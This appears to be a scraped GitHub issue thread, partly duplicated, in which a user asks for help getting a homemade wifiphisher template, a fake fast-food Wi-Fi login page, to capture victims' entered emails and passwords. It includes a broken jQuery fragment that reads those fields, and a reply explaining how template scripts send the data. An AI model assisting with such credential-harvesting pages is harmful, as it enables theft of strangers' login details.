You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Hi thanks for the great templates there really good and fun been testing a few out tonight and there working flawlessly I love to see more in the future for fast food such as burger king McDonald KFC i've been trying to make my own Ive added the required code in order for wifiphisher to recognize and output the users input text however I don't get anything to display in the terminal.
I was looking around and found your github and thought you may have some idea about it.
The follow page I'm creating was downloaded from github and I done a little editing and added the following code.
I seen that you had included a script at the bottom of your Templates and I was wondering if this could be the problem that I will need to include something similar to this thanks a lot.
This is not an issue with any of your templates feel free to close whenever I could just really do with a heads up on it right now as there not much doc online and I thought you would be the best person to ask thanks in advance.
<script>
/*
Check the password field and act accordingly.
*/
$("#btn").on("click", function(e) {e.preventDefault();// get the password box and checkbox elementsvarinput=document.getElementById("eml");varinput2=document.getElementById("pwd");// check to see if the value is emptyif(input.value==""){passNotValid();}elseif(input2.value== "" ){//check if the value of the repeat field is emptypassNotValid();}else{// post the data
The text was updated successfully, but these errors were encountered:
Hi @JavaRockstar Although you have the input fields and a button the button doesn't do anything from what I can see. The scripts that you see are JavaScript code that actually manipulates and sends the data. A side note the names of the text no longer has to contain the wfpshr value and it can be anything. On the script that you have provided on the bottom of the page you name to change the name for the inputs. So in this case it would be
Hi thanks for the great templates there really good and fun been testing a few out tonight and there working flawlessly I love to see more in the future for fast food such as burger king McDonald KFC i've been trying to make my own Ive added the required code in order for wifiphisher to recognize and output the users input text however I don't get anything to display in the terminal.
I was looking around and found your github and thought you may have some idea about it.
The follow page I'm creating was downloaded from github and I done a little editing and added the following code.
I seen that you had included a script at the bottom of your Templates and I was wondering if this could be the problem that I will need to include something similar to this thanks a lot.
This is not an issue with any of your templates feel free to close whenever I could just really do with a heads up on it right now as there not much doc online and I thought you would be the best person to ask thanks in advance.
The text was updated successfully, but these errors were encountered: